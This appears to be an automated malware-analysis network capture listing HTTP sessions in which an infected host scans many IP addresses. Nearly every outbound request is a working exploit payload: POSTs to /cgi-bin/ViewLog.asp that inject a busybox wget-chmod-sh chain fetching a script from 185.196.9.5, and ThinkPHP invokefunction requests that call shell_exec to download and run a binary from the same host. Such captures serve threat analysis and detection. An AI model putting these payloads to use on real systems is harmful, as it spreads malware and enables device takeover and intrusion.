Feb 25, 2024 19:05:34.789720058 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1227	192.168.2.15	39852	94.122.114.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.796617985 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1228	192.168.2.15	50984	31.220.22.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.888300896 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.088429928 CET	1286	IN	HTTP/1.1 500 Server Error Date: Sun, 25 Feb 2024 18:05:35 GMT X-Content-Type-Options: nosniff Content-Type: text/html;charset=utf-8 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache,no-store,must-revalidate X-Hudson-Theme: default Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin Set-Cookie: JSESSIONID.9bd24418=node051c8pk2eiknjayfqj9zmg4583288.node0; Path=/; HttpOnly X-Hudson: 1.395 X-Jenkins: 2.414.3 X-Jenkins-Session: 63d76a28 X-Frame-Options: sameorigin Content-Encoding: gzip X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArPuDzHh4n6JRAuiSb8dAUDbvrrMJjaAGMJL4QPMgZbridQz4ivdLz9obF9TnUbNAeK1bSDwsVqayAYwOFp99cfJMW4XvfxTqAJbl2Bm8CRPrg6lEfFi4oLJBRyBhDd5cD4HgwRPNQJn5qN3het2feMEvzeM9E8Gyc5m+nV6fQcTE729JEAmFm1rrt7IDvagdeCcMBI7uoQLVhTwmQFvPQiU/PuWZz6m2f3rVE9YLepBIYo6X0zNKURIilCDfpOcMlBHM+LoNGs4rX6OvH/ToEdXdbtb1znof6yBm2iMiNF1Sgg5Fs8ThKwqvnvxHPkR9pyRB6R1OhtH1ENN/db26EQIDAQAB Content-Length: 4894 Connection: close Server: Jetty(10.0.17) Data Raw: 1f 8b 08 00 00 00 00 00 00 ff cd 5a e9 b2 a3 3a 92 fe df 4f 41 bb 63 e2 fe 70 63 f6 ed 4e 9d 9a c0 0b de 37 bc 60 33 31 51 c1 22 0c 98 cd 08 6c ec a7 99 67 99 27 1b 01 f6 59 ea 9e aa 3a 75 eb 76 44 9f 38 06 21 a5 3e a5 32 53 a9 4c c1 df 30 ec 6f 18 f6 e9 ef dd 79 67 bd 5f f4 30 37 0b 83 cf 9f ee 57 60 d8 58 0a e0 46 9d 3c 35 08 98 19 99 67 11 3c 63 0b bc 41 8b 0d cc 36 32 03 4f e3 38 cb d3 e0 a9 f1 78 06 b0 7a fc 06 39 28 32 10 41 2f 8e 20 6e 9c 0d 2f 30 cc 00 3c 35 b2 34 07 77 82 3c f2 32 3c 03 30 7b 6a 38 46 00 1f d5 5e 68 1c be 81 4c d4 6d 77 42 2b cd 43 13 2f 39 07 e9 53 63 04 a2 a3 87 c6 ea 94 b5 6f 28 ce 46 90 a3 91 2d 4e 22 79 d2 60 38 92 65 39 c3 a6 00 90 38 da 20 29 96 a1 4d 4e b2 59 46 a2 05 c3 16 1c d3 01 b4 c1 09 8e 61 99 a6 48 b2 36 49 db 86 29 30 4c e3 33 Data Ascii: Z:OAcpcN7`31Q"lg'Y:uvD8!>2SL0oyg_07W`XF<5g<cA62O8xz9(2A/ n/0<54w<2<0{j8F^hLmwB+C/9Sco(F-N"y`8e98 )MNYFaH6I)0L3

Session ID	Source IP	Source Port	Destination IP	Destination Port
1229	192.168.2.15	52828	31.50.235.75	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.924715996 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.110589027 CET	29	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port
1230	192.168.2.15	49040	31.136.195.221	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.926938057 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.492628098 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:36.644620895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:39.044553995 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:43.652686119 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1231	192.168.2.15	39466	85.231.72.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.971745968 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1232	192.168.2.15	55538	94.121.25.240	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.992252111 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1233	192.168.2.15	38888	31.200.113.55	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.007498026 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1234	192.168.2.15	34506	94.121.108.192	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.012932062 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1235	192.168.2.15	43326	94.122.10.15	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.017106056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1236	192.168.2.15	33184	94.121.72.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.020669937 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1237	192.168.2.15	34304	94.70.240.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.023271084 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.286180973 CET	388	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 20:05:33 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1238	192.168.2.15	44556	95.67.21.62	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.418092966 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:35.627351999 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.19.6 Date: Sun, 25 Feb 2024 18:05:35 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.6</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1239	192.168.2.15	58354	95.156.54.3	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.436635971 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1240	192.168.2.15	48432	95.9.175.207	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.463860035 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1241	192.168.2.15	55072	95.110.157.115	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.617857933 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:35.812756062 CET	404	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:35 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1242	192.168.2.15	60414	95.163.237.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.650840044 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:35.865237951 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:05:35 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1243	192.168.2.15	36264	95.108.245.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.663913012 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:35.888837099 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:35 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1244	192.168.2.15	34164	31.136.73.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.752403021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:38.788558960 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:44.936494112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1245	192.168.2.15	60040	31.136.217.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.752429962 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
